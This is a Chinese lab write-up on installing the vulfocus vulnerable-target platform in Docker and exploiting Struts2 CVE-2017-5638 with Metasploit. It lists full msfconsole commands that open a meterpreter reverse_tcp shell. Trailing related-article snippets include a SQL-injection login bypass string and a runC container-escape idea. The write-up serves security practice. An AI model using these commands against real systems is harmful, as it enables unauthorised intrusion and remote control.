开源漏洞靶场vulfocus的实践(一)

VSole2021-10-31 13:36:42

本周末实践的是开源漏洞靶场vulfocus,真是简单易用,以下是实践记录,

搞个ubuntu18.04的虚拟机,安装docker,

sudo apt install docker.io,

sudo systemctl enable docker,

sudo gpasswd -a ubuntu docker,

newgrp docker,

下载vulfocus容器镜像,docker pull vulfocus/vulfocus:latest,

启动vulfocus容器实例,

docker run -d -p 8001:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=10.90.11.162 vulfocus/vulfocus,

这就可以访问vulfocus的管理界面了,http://10.90.11.162:8001,

admin/admin,登录进去,首先看镜像管理,开始是空的,点击一键同步,就都出来了,

我习惯用cve-2017-5638做实验,搜一下看有没有,

搜出来的可以点击下载,就自动导入了,也可以手动导入本地的镜像,因为我拿vulfocus自带的cve-2017-5638镜像做攻击验证没成功,就又自己手动导入的piesecurity/apache-struts2-cve-2017-5638,

导入镜像成功后,主页上就能看到并可以启动了,

本地安装个metasploit,进行攻击实验,

msfconsole,

use exploit/multi/http/struts2_content_type_ognl,

set RHOST 10.90.11.162,

set RPORT 34351,

set TARGETURI showcase.jsp,

set LHOST 10.90.11.162,

set payload linux/x64/meterpreter/reverse_tcp,

exploit,

这里需要特别注意的是,需要自己手动docker ps看一下靶机的映射端口,

并通过set RPORT进行配置,攻击成功了就是下面这样,

漏洞docker
本作品采用《CC 协议》,转载必须注明作者和本文链接
0x01 工具介绍收集个人自接触渗透测试用于漏洞验证的所有热门 cve、poc 攻击和有效和杀伤部分工具,包括:POC+小工具+扫描器+CVE+Jar包+RCE0x02 安装与使用1、验证地址Vulfocus、Vulhub、漏洞docker、Vultarget、ByteCTF、攻防世界等
但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。
干货|最全的Jboss漏洞复现笔记
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LG
fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,都可以实现json的转换。方法名称不同而已,最后的实现结果都是一样的。
腾讯安全云鼎实验室持续监控云原生在野攻击威胁态势,继DockerHub发现百万下载量黑产镜像(详见文章 DockerHub再现百万下载量黑产镜像,小心你的容器被挖矿)之后,近期实验室最新捕获到TeamTNT黑客团队新型在野容器攻击活动,相比之前TeamTNT挖矿木马,此次新型攻击手法对原挖矿木马进行了升级,并利用容器环境进行感染传播。
由于测试过程中很多系统我们能接触到的只有一个登陆界面,所以要充分挖掘漏洞,进行深入操作登录 注册万能密码绕过登录存在 SQL 注入的情况下,有可能使用万能密码直接登录admin' or '1'='1'--. 有超级多登录口 SQL 注入存在 SQL 注入的话直接注出账密有些可以构造用户注入登录,比如熊海 cms 后台登录处存在 sql 注入$login=$_POST['login'];
2020年12月01日,阿里云应急响应中心监测到 containerd 官方发布安全更新,修复了 Docker 容器逃逸漏洞漏洞描述 Containerd 是一个控制 runC 的守护进程,提供命令行客户端和 API,用于在一个机器上管理容器。在特定网络条件下,攻击者可通过访问containerd-shim API,从而实现Docker容器逃逸。阿里云应急响应中心提醒 containerd 用户尽快采取安全措施阻止漏洞攻击。影响版本 containerd < containerd < 安全版本 containerd >= containerd >= 安全建议 1. 升级 containerd 至最新版本。
比如目标文件是/bin/bash,将它替换成指定解释器路径为#!/proc/self/exe的可执行脚本,在容器中执行/bin/bash时将执行/proc/self/exe,它指向host上的runC文件。
VSole
网络安全专家